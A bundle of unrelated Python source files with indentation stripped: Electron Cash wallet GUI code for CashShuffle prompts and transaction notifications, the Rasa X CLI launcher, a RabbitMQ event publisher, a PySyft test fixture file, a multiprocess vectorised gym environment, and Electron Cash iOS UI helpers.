info = ' '.join([_("If you enable it, Electron Cash will shuffle your coins for greater <b>privacy</b>. However, you will pay fractions of a penny per shuffle in transaction fees."),
_("(You can always toggle it later using the CashShuffle button.)")])
res, chkd = self.msg_box(icon=icon,
parent=self.top_level_window(),
title=_('Would you like to turn on CashShuffle?'),
text=message, rich_text=True, informative_text=info,
checkbox_text=_("Never ask for this wallet"),
buttons=(_('Enable CashShuffle'), _("Not now")),
                                         defaultButton=_('Enable CashShuffle'), escapeButton=_("Not now") )
if chkd:
# they don't want to be asked again, so just remember what they answered and apply this answer each time.
storage.put(ConfKeys.PerWallet.MAIN_WINDOW_NAGGER_ANSWER, bool(res==0))
else:
                # They've specified "Never ask", so apply whatever button they pushed when they said that as the auto-setting.
                res = 0 if nagger_answer else 1 # if nagger_answer was True, no prompt, just auto-enable, otherwise leave it disabled.
if res == 0:
self.toggle_cashshuffle()
def restart_cashshuffle(self, msg = None, parent = None):
if (parent or self).question("{}{}".format(msg + "\n\n" if msg else "", _("Restart the CashShuffle plugin now?")),
app_modal=True):
p = self.cashshuffle_plugin_if_loaded()
if p:
p.restart_all()
self.notify(_("CashShuffle restarted"))
else:
self.notify(_("CashShuffle could not be restarted"))
_cash_shuffle_flag = 0
def cashshuffle_set_flag(self, flag):
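        # flag: 0 = normal, 1 = server error (shows a popup label over the status button until resolved).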
flag = int(flag)
changed = flag != self._cash_shuffle_flag
if not changed:
return
if flag:
def onClick():
KillPopupLabel("CashShuffleError")
self.show_cashshuffle_settings()
ShowPopupLabel(name = "CashShuffleError",
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Server Error"),_("Right-click to resolve")),
target=self.cashshuffle_status_button,
timeout=20000, onClick=onClick, onRightClick=onClick,
dark_mode = ColorScheme.dark_scheme)
else:
KillPopupLabel("CashShuffleError")
self.print_error("Cash Shuffle flag is now {}".format(flag))
oldTip = self.cashshuffle_status_button.statusTip()
self._cash_shuffle_flag = flag
self.update_status()
newTip = self.cashshuffle_status_button.statusTip()
if newTip != oldTip:
self.statusBar().showMessage(newTip, 7500)
def cashshuffle_get_flag(self):
return self._cash_shuffle_flag
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow if offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
if bN: self.process_notifs() # rate_limited call (1 per 15 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from the below
        process_verifs (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
parent.history_list.setUpdatesEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI"
.format(n_updates, len(items)))
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
n_ok = 0
txns = self.notifs_get_and_clear()
if txns and parent.wallet.storage.get('gui_notify_tx', True):
# Combine the transactions
total_amount = 0
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
n_ok += 1
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
parent.notify(_("{} new transactions: {}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True)))
else:
parent.notify(_("New transaction: {}").format(parent.format_amount_and_units(total_amount, is_diff=True)))
|
x.py
|
import argparse
import asyncio
import importlib.util
import logging
import os
import signal
import traceback
from multiprocessing import get_context
from typing import List, Text, Optional, Tuple, Union, Iterable
import aiohttp
import ruamel.yaml as yaml
import rasa.cli.utils as cli_utils
import rasa.utils.io as io_utils
from rasa.cli.arguments import x as arguments
from rasa.constants import (
DEFAULT_ENDPOINTS_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_CONFIG_PATH,
DEFAULT_LOG_LEVEL_RASA_X,
DEFAULT_RASA_X_PORT,
DEFAULT_RASA_PORT,
)
from rasa.core.utils import AvailableEndpoints
from rasa.utils.endpoints import EndpointConfig
logger = logging.getLogger(__name__)
DEFAULT_EVENTS_DB = "events.db"
# noinspection PyProtectedMember
def add_subparser(
subparsers: argparse._SubParsersAction, parents: List[argparse.ArgumentParser]
):
x_parser_args = {
"parents": parents,
"conflict_handler": "resolve",
"formatter_class": argparse.ArgumentDefaultsHelpFormatter,
}
if is_rasa_x_installed():
# we'll only show the help msg for the command if Rasa X is actually installed
x_parser_args["help"] = "Starts the Rasa X interface."
shell_parser = subparsers.add_parser("x", **x_parser_args)
shell_parser.set_defaults(func=rasa_x)
arguments.set_x_arguments(shell_parser)
def _rasa_service(
args: argparse.Namespace,
endpoints: AvailableEndpoints,
rasa_x_url: Optional[Text] = None,
credentials_path: Optional[Text] = None,
):
"""Starts the Rasa application."""
from rasa.core.run import serve_application
# needs separate logging configuration as it is started in its own process
logging.basicConfig(level=args.loglevel)
io_utils.configure_colored_logging(args.loglevel)
logging.getLogger("apscheduler").setLevel(logging.WARNING)
if not credentials_path:
credentials_path = _prepare_credentials_for_rasa_x(
args.credentials, rasa_x_url=rasa_x_url
)
serve_application(
endpoints=endpoints,
port=args.port,
credentials=credentials_path,
cors=args.cors,
auth_token=args.auth_token,
enable_api=True,
jwt_secret=args.jwt_secret,
jwt_method=args.jwt_method,
ssl_certificate=args.ssl_certificate,
ssl_keyfile=args.ssl_keyfile,
ssl_password=args.ssl_password,
)
def _prepare_credentials_for_rasa_x(
credentials_path: Optional[Text], rasa_x_url: Optional[Text] = None
) -> Text:
credentials_path = cli_utils.get_validated_path(
credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
)
if credentials_path:
credentials = io_utils.read_config_file(credentials_path)
else:
credentials = {}
    # this makes sure Rasa X is properly configured no matter what
if rasa_x_url:
credentials["rasa"] = {"url": rasa_x_url}
dumped_credentials = yaml.dump(credentials, default_flow_style=False)
tmp_credentials = io_utils.create_temporary_file(dumped_credentials, "yml")
return tmp_credentials
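# Illustration (assumption, not emitted verbatim by Rasa): when no credentials
# file exists, the temporary YAML file returned above contains only the Rasa X
# channel entry, e.g. with the default Rasa X port assumed here:
#
#   rasa:
#     url: http://localhost:5002/api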
def _overwrite_endpoints_for_local_x(
endpoints: AvailableEndpoints, rasa_x_token: Text, rasa_x_url: Text
):
from rasa.utils.endpoints import EndpointConfig
import questionary
endpoints.model = EndpointConfig(
"{}/projects/default/models/tags/production".format(rasa_x_url),
token=rasa_x_token,
wait_time_between_pulls=2,
)
overwrite_existing_event_broker = False
if endpoints.event_broker and not _is_correct_event_broker(endpoints.event_broker):
cli_utils.print_error(
"Rasa X currently only supports a SQLite event broker with path '{}' "
"when running locally. You can deploy Rasa X with Docker "
"(https://rasa.com/docs/rasa-x/deploy/) if you want to use "
"other event broker configurations.".format(DEFAULT_EVENTS_DB)
)
overwrite_existing_event_broker = questionary.confirm(
"Do you want to continue with the default SQLite event broker?"
).ask()
if not overwrite_existing_event_broker:
exit(0)
if not endpoints.tracker_store or overwrite_existing_event_broker:
endpoints.event_broker = EndpointConfig(type="sql", db=DEFAULT_EVENTS_DB)
def _is_correct_event_broker(event_broker: EndpointConfig) -> bool:
return all(
[
event_broker.type == "sql",
event_broker.kwargs.get("dialect", "").lower() == "sqlite",
event_broker.kwargs.get("db") == DEFAULT_EVENTS_DB,
]
)
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
"""Starts the Rasa X API with Rasa as a background process."""
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
rasa_x_url = "http://localhost:{}/api".format(args.rasa_x_port)
_overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)
vars(args).update(
dict(
nlu_model=None,
cors="*",
auth_token=args.auth_token,
enable_api=True,
endpoints=endpoints,
)
)
ctx = get_context("spawn")
p = ctx.Process(
target=_rasa_service, args=(args, endpoints, rasa_x_url, credentials_path)
)
p.daemon = True
p.start()
return p
def is_rasa_x_installed():
"""Check if Rasa X is installed."""
    # we could also do something like checking if `import rasax` works,
    # but the issue with that is that it actually imports the package, and this
    # takes some time that we don't want to spend when booting the CLI
return importlib.util.find_spec("rasax") is not None
def generate_rasa_x_token(length: int = 16):
"""Generate a hexadecimal secret token used to access the Rasa X API.
A new token is generated on every `rasa x` command.
"""
from secrets import token_hex
return token_hex(length)
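# Illustration (not part of the CLI): with the default length of 16 bytes,
# token_hex() produces a 32-character hexadecimal string.
if __name__ == "__main__":
    _example_token = generate_rasa_x_token()
    assert len(_example_token) == 32
    print("example Rasa X token:", _example_token)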
def _configure_logging(args: argparse.Namespace):
from rasa.core.utils import configure_file_logging
from rasa.utils.common import set_log_level
log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
if isinstance(log_level, str):
log_level = logging.getLevelName(log_level)
logging.basicConfig(level=log_level)
io_utils.configure_colored_logging(args.loglevel)
set_log_level(log_level)
configure_file_logging(logging.root, args.log_file)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
logging.getLogger("engineio").setLevel(logging.WARNING)
logging.getLogger("pika").setLevel(logging.WARNING)
logging.getLogger("socketio").setLevel(logging.ERROR)
if not log_level == logging.DEBUG:
logging.getLogger().setLevel(logging.WARNING)
logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(project_path: Text):
mandatory_files = [DEFAULT_CONFIG_PATH, DEFAULT_DOMAIN_PATH]
for f in mandatory_files:
if not os.path.exists(os.path.join(project_path, f)):
return False
return True
def _validate_rasa_x_start(args: argparse.Namespace, project_path: Text):
if not is_rasa_x_installed():
cli_utils.print_error_and_exit(
"Rasa X is not installed. The `rasa x` "
"command requires an installation of Rasa X. "
"Instructions on how to install Rasa X can be found here: "
"https://rasa.com/docs/rasa-x/installation-and-setup/."
)
if args.port == args.rasa_x_port:
cli_utils.print_error_and_exit(
"The port for Rasa X '{}' and the port of the Rasa server '{}' are the "
"same. We need two different ports, one to run Rasa X (e.g. delivering the "
"UI) and another one to run a normal Rasa server.\nPlease specify two "
"different ports using the arguments '--port' and '--rasa-x-port'.".format(
args.rasa_x_port, args.port
)
)
if not is_rasa_project_setup(project_path):
cli_utils.print_error_and_exit(
"This directory is not a valid Rasa project. Use 'rasa init' "
"to create a new Rasa project or switch to a valid Rasa project "
"directory (see http://rasa.com/docs/rasa/user-guide/"
"rasa-tutorial/#create-a-new-project)."
)
_validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))
if args.data and not os.path.exists(args.data):
cli_utils.print_warning(
"The provided data path ('{}') does not exists. Rasa X will start "
"without any training data.".format(args.data)
)
def _validate_domain(domain_path: Text):
from rasa.core.domain import Domain, InvalidDomain
try:
Domain.load(domain_path)
except InvalidDomain as e:
cli_utils.print_error_and_exit(
"The provided domain file could not be loaded. " "Error: {}".format(e)
)
def rasa_x(args: argparse.Namespace):
from rasa.cli.utils import signal_handler
signal.signal(signal.SIGINT, signal_handler)
_configure_logging(args)
if args.production:
run_in_production(args)
else:
run_locally(args)
async def _pull_runtime_config_from_server(
config_endpoint: Optional[Text],
attempts: int = 60,
wait_time_between_pulls: Union[int, float] = 5,
keys: Iterable[Text] = ("endpoints", "credentials"),
) -> Optional[List[Text]]:
"""Pull runtime config from `config_endpoint`.
Returns a list of paths to yaml dumps, each containing the contents of one of
`keys`.
"""
while attempts:
try:
async with aiohttp.ClientSession() as session:
async with session.get(config_endpoint) as resp:
if resp.status == 200:
rjs = await resp.json()
try:
return [
io_utils.create_temporary_file(rjs[k]) for k in keys
]
except KeyError as e:
cli_utils.print_error_and_exit(
"Failed to find key '{}' in runtime config. "
"Exiting.".format(e)
)
else:
logger.debug(
"Failed to get a proper response from remote "
"server. Status Code: {}. Response: '{}'"
"".format(resp.status, await resp.text())
)
except aiohttp.ClientError as e:
logger.debug("Failed to connect to server. Retrying. {}".format(e))
await asyncio.sleep(wait_time_between_pulls)
attempts -= 1
cli_utils.print_error_and_exit(
"Could not fetch runtime config from server at '{}'. "
"Exiting.".format(config_endpoint)
)
def run_in_production(args: argparse.Namespace):
from rasa.cli.utils import print_success
print_success("Starting Rasa X in production mode... 🚀")
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
_rasa_service(args, endpoints, None, credentials_path)
def _get_credentials_and_endpoints_paths(
args: argparse.Namespace
) -> Tuple[Optional[Text], Optional[Text]]:
config_endpoint = args.config_endpoint
if config_endpoint:
loop = asyncio.get_event_loop()
endpoints_config_path, credentials_path = loop.run_until_complete(
_pull_runtime_config_from_server(config_endpoint)
)
else:
endpoints_config_path = cli_utils.get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
credentials_path = None
return credentials_path, endpoints_config_path
def run_locally(args: argparse.Namespace):
# noinspection PyUnresolvedReferences
from rasax.community import local # pytype: disable=import-error
args.rasa_x_port = args.rasa_x_port or DEFAULT_RASA_X_PORT
args.port = args.port or DEFAULT_RASA_PORT
project_path = "."
_validate_rasa_x_start(args, project_path)
local.check_license_and_metrics(args)
rasa_x_token = generate_rasa_x_token()
process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)
try:
local.main(args, project_path, args.data, token=rasa_x_token)
except Exception:
        print(traceback.format_exc())
cli_utils.print_error(
"Sorry, something went wrong (see error above). Make sure to start "
"Rasa X with valid data and valid domain and config files. Please, "
"also check any warnings that popped up.\nIf you need help fixing "
"the issue visit our forum: https://forum.rasa.com/."
)
finally:
process.terminate()
|
observers.py
|
"""Classes for observers in ``emanate``."""
import logging
from threading import Thread
from six.moves import queue
from pika.exceptions import AMQPError, RecursionError
from pikachewie.data import Properties
from pikachewie.helpers import broker_from_config
from pikachewie.publisher import BlockingJSONPublisher
__metaclass__ = type
log = logging.getLogger(__name__)
class BasePublisher:
"""Base Publisher class."""
def __init__(self, *args, **kwargs):
pass
def publish(self, event):
pass
NullPublisher = BasePublisher
"""Publisher that silently discards all events."""
class QueuePublisher(BasePublisher):
"""Publisher that dispatches events to a `queue.Queue`."""
def __init__(self):
self._queue = queue.Queue(maxsize=256)
self._worker = Thread(target=self._process_queue)
self._worker.daemon = True
self._worker.start()
def publish(self, event):
try:
self._queue.put_nowait(event)
except queue.Full as exc:
log.exception('Cannot publish event: %r', exc)
            log.warning('Failed to publish event %s with context %s',
event.data, event.context)
def _process_queue(self):
while True:
event = self._queue.get()
try:
self._process_event(event)
except Exception as exc:
log.exception(exc)
finally:
self._queue.task_done()
def _process_event(self, event):
pass
class RabbitMQPublisher(QueuePublisher):
"""Publisher that publishes events as messages to RabbitMQ.
By default, messages are published on a headers exchange. The name of the
exchange is given in the `config` passed to the Publisher's constructor.
"""
def __init__(self, config, broker_name='default'):
self.config = config
self.broker_name = broker_name
self.broker = broker_from_config(
self.config['rabbitmq']['brokers'][self.broker_name]
)
self.publisher = BlockingJSONPublisher(self.broker)
self.exchange = self.config['rabbitmq']['default_exchange']
self._initialize()
super(RabbitMQPublisher, self).__init__()
def _initialize(self):
# declare the exchange (will trigger a connection to the broker)
self.publisher.channel.exchange_declare(
self.exchange,
**self.config['rabbitmq']['exchanges'][self.exchange]
)
def _wait_for_event(self):
while True:
# trigger processing of RabbitMQ data events
try:
self.publisher.process_data_events()
except Exception as exc:
log.exception('Error processing data events: %r', exc)
del self.publisher.channel
try:
return self._queue.get(timeout=10)
except queue.Empty:
pass
def _process_queue(self):
while True:
event = self._wait_for_event()
self._handle_event(event)
def _handle_event(self, event):
try:
self._process_event(event)
except Exception as exc:
log.exception(exc)
finally:
self._queue.task_done()
def _process_event(self, event):
properties = Properties()
if event.context:
properties.headers = event.context
routing_key = properties.headers.get('routing_key', '')
try:
self.publisher.publish(self.exchange, routing_key, event.data, properties)
except (AMQPError, RecursionError) as exc:
log.exception('Cannot publish to RabbitMQ: %r', exc)
            log.warning('Failed to publish message payload %s with context %s',
event.data, event.context)
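# --- Hedged usage sketch (illustration only; ``DemoEvent`` and ``PrintPublisher``
# are hypothetical and not part of emanate) -----------------------------------
# QueuePublisher hands every published event to its daemon worker thread, so a
# concrete publisher only needs to override ``_process_event``.
if __name__ == '__main__':
    from collections import namedtuple
    logging.basicConfig(level=logging.INFO)
    DemoEvent = namedtuple('DemoEvent', 'data context')

    class PrintPublisher(QueuePublisher):
        def _process_event(self, event):
            log.info('processed %s with context %s', event.data, event.context)

    publisher = PrintPublisher()
    publisher.publish(DemoEvent(data={'answer': 42}, context={'routing_key': 'demo'}))
    publisher._queue.join()  # block until the worker thread has drained the queue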
|
conftest.py
|
import pytest
import torch
from multiprocessing import Process
import syft
from syft import TorchHook
@pytest.fixture()
def start_proc(): # pragma: no cover
""" helper function for spinning up a websocket participant """
def _start_proc(participant, kwargs):
def target():
server = participant(**kwargs)
server.start()
p = Process(target=target)
p.start()
return p
return _start_proc
@pytest.fixture(scope="session", autouse=True)
def hook():
hook = TorchHook(torch)
return hook
@pytest.fixture(scope="session", autouse=True)
def workers(hook):
# Define 3 virtual workers
alice = syft.VirtualWorker(id="alice", hook=hook, is_client_worker=False)
bob = syft.VirtualWorker(id="bob", hook=hook, is_client_worker=False)
james = syft.VirtualWorker(id="james", hook=hook, is_client_worker=False)
output = {"me": hook.local_worker, "alice": alice, "bob": bob, "james": james}
return output
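# --- Hedged sketch (hypothetical test, illustration only; ``send``/``get``/
# ``location`` are the PySyft tensor methods assumed here) --------------------
# A test can move a tensor to one of the virtual workers and fetch it back:
#
# def test_send_and_get(workers):
#     x = torch.tensor([1.0, 2.0, 3.0]).send(workers["alice"])
#     assert x.location == workers["alice"]
#     assert torch.equal(x.get(), torch.tensor([1.0, 2.0, 3.0]))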
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
if self.viewer is not None:
self.viewer.close()
self.closed = True
def render(self, mode='human'):
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
bigimg = tile_images(imgs)
if mode == 'human':
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(bigimg[:, :, ::-1])
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
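# --- Hedged usage sketch (illustration only; 'CartPole-v1' is just an example env id) ---
# SubprocVecEnv expects a list of zero-argument callables, each constructing one
# environment inside its own worker process.
if __name__ == '__main__':
    import gym

    def make_env(seed):
        def _thunk():
            env = gym.make('CartPole-v1')
            env.seed(seed)
            return env
        return _thunk

    vec_env = SubprocVecEnv([make_env(i) for i in range(4)])
    obs = vec_env.reset()                                   # stacked: one row per env
    actions = [vec_env.action_space.sample() for _ in range(4)]
    obs, rewards, dones, infos = vec_env.step(actions)      # step() = step_async() + step_wait()
    vec_env.close()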
|
utils.py
|
#!/usr/bin/env python3
#
# Electron Cash - lightweight Bitcoin Cash client
# Copyright (C) 2012 thomasv@gitorious
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, os, json, qrcode, qrcode.image.svg, tempfile, random, queue, threading, time, stat
from collections import namedtuple
from inspect import signature
from typing import Callable, Any
from .uikit_bindings import *
from .custom_objc import *
from electroncash.i18n import _
def is_2x_screen() -> bool:
    return bool(UIScreen.mainScreen.scale > 1.0)
def is_iphone() -> bool:
return bool(UI_USER_INTERFACE_IDIOM() == UIUserInterfaceIdiomPhone)
def is_iphone5() -> bool:
# iphone5 has 1136 pix height
return is_iphone() and ( abs(UIScreen.mainScreen.nativeBounds.size.height - 1136.0) < 0.5 )
def is_iphone4() -> bool:
# iphone4 has <1136 pix height
return is_iphone() and ( UIScreen.mainScreen.nativeBounds.size.height - 1136.0 < -0.5 )
def is_iphoneX() -> bool:
# iphone X has 2436 pix height
    return is_iphone() and ( abs(UIScreen.mainScreen.nativeBounds.size.height - 2436.0) < 0.5 )
def is_ipad() -> bool:
return not is_iphone()
def is_landscape() -> bool:
o = UIApplication.sharedApplication.statusBarOrientation
return bool(o in [UIInterfaceOrientationLandscapeLeft,UIInterfaceOrientationLandscapeRight])
def is_portrait() -> bool:
return not is_landscape()
def get_fn_and_ext(fileName: str) -> tuple:
*p1, ext = fileName.split('.')
fn=''
    if len(p1) == 0:
fn = ext
ext = None
else:
fn = '.'.join(p1)
return (fn,ext)
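# Illustration: the split happens on the last dot only, e.g.
#   get_fn_and_ext('wallet.backup.json') -> ('wallet.backup', 'json')
#   get_fn_and_ext('README')             -> ('README', None)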
def get_user_dir():
dfm = NSFileManager.defaultManager
# documents dir
thedir = dfm.URLsForDirectory_inDomains_(9, 1).objectAtIndex_(0)
return str(thedir.path)
def get_tmp_dir():
return str(ObjCInstance(uikit.NSTemporaryDirectory()))
def uiview_set_enabled(view : ObjCInstance, b : bool) -> None:
if view is None: return
view.userInteractionEnabled = bool(b)
view.alpha = float(1.0 if bool(b) else 0.3)
view.setNeedsDisplay()
def pathsafeify(s : str) -> str:
    return s.translate({ord(i):None for i in r':/.\$#@[]}{*?'}).strip()
def cleanup_tmp_dir():
t0 = time.time()
d = get_tmp_dir()
ct = 0
tot = 0
import glob
if os.path.isdir(d):
it = glob.iglob(os.path.join(d,'*'))
for f in it:
tot += 1
try:
os.remove(f)
ct += 1
except:
pass
if tot:
NSLog("Cleaned up %d/%d files from tmp dir in %f ms",ct,tot,(time.time()-t0)*1e3)
def ios_version_string() -> str:
dev = UIDevice.currentDevice
return "%s %s %s (%s)"%(str(dev.systemName), str(dev.systemVersion), str(dev.model), str(dev.identifierForVendor))
# new color scheme from Max
_ColorScheme = None
def uicolor_custom(name : str) -> ObjCInstance:
global _ColorScheme
name = name.strip().lower() if name else ""
if not _ColorScheme:
        # initialize it on first call. We don't initialize it on initial module load to shave a few ms off app loading time.
_ColorScheme = {
'dark' : UIColor.colorInDeviceRGBWithHexString_("#414141").retain(),
'light' : UIColor.colorInDeviceRGBWithHexString_("#CCCCCC").retain(),
'ultralight': UIColor.colorInDeviceRGBWithHexString_("#F6F6F6").retain(),
'nav' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'link' : UIColor.colorInDeviceRGBWithHexString_("#558BFF").retain(),
'linktapped': UIColor.colorInDeviceRGBWithHexString_("#FF8BFF").retain(),
'navtint' : UIColor.colorInDeviceRGBWithHexString_("#FFFFFF").retain(),
'red' : UIColor.colorInDeviceRGBWithHexString_("#FF6161").retain(),
'notif' : UIColor.colorInDeviceRGBWithHexString_("#BBFF3B").retain(), # very bright green
'green' : UIColor.colorInDeviceRGBWithHexString_("#9BDF1B").retain(), # less bright green
}
schemecolor = _ColorScheme.get(name, None)
if schemecolor:
return schemecolor
# other, old-style colors. These will be removed once we fully transition to new UI style
if name in ['blue', 'myblue', 'tf', 'password']:
return UIColor.colorWithRed_green_blue_alpha_(0.91746425629999995, 0.95870447160000005, 0.99979293349999998, 1.0)
if name in ['change', 'changeaddress', 'change address']:
return UIColor.colorWithRed_green_blue_alpha_(1.0,0.9,0.3,0.3)
if name in ['frozen', 'frozenaddress', 'frozen address']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.125)
if name in ['frozentext', 'frozen text', 'frozenaddresstext', 'frozen address text']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,1.0)
if name in ['frozentextbright', 'frozen text bright', 'frozenaddresstextbright', 'frozen address text bright']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.8,0.8,1.0)
if name in ['frozentextlight', 'frozen text light', 'frozenaddresstextlight', 'frozen address text light']:
return UIColor.colorWithRed_green_blue_alpha_(0.0,0.5,0.5,0.4)
NSLog("uicolor_custom: UNKNOWN custom color '%s' -- returning GRAY -- FIXME"%(str(name)))
return UIColor.grayColor
